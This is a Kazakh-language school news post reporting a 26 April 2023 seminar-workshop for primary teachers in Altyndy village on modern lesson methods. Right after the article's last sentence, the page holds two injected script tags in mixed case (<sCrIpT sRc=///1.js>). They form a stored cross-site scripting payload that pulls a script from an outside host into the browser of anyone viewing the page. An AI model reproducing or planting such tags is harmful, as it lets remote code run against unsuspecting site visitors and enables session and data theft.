2023 жылдың 26 сәуірінде "Ақмола облысы білім басқармасының Бұланды ауданының білім бөлімінің Алтынды ауылының жалпы орта білім беретін мектебі" КММ базасында "Бастауыш мектептегі заманауи сабақ: сабақтағы жүйелік-белсенділік тәсілі" тақырыбында бастауыш сынып мұғалімдерінің семинар–практикумы өтті. Мақсаты: білім беру сапасын қамтамасыз етудің негізгі шарттарының бірі ретінде мұғалімнің кәсіби және жеке өсуіне жағдай жасау. Мектеп әкімшілігі мен мұғалімдер ұйымдастырған іс-шараға аудан мектептерінің бастауыш сынып мұғалімдері қатысты. Аталған семинарда Алтынды орта мектебінің бастауыш сынып мұғалімдерінің жұмыс тәжірибесі ұсынылды. Семинар жоғары деңгейде өтті. Бастауыш сынып мұғалімдері ашық сабақтарды оқытуда өздерінің кәсіби шеберліктерін көрсетті және басқа мектептердегі әріптестерімен тәжірибелерімен бөлісті. Алтынды орта мектебінің педагогтеріне шығармашылық табыс, жұмыста жоғары нәтижелер тілейміз!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.05.2023

Просмотров: 338


Пікір қосу



Деректерді қолтаңбаға қосу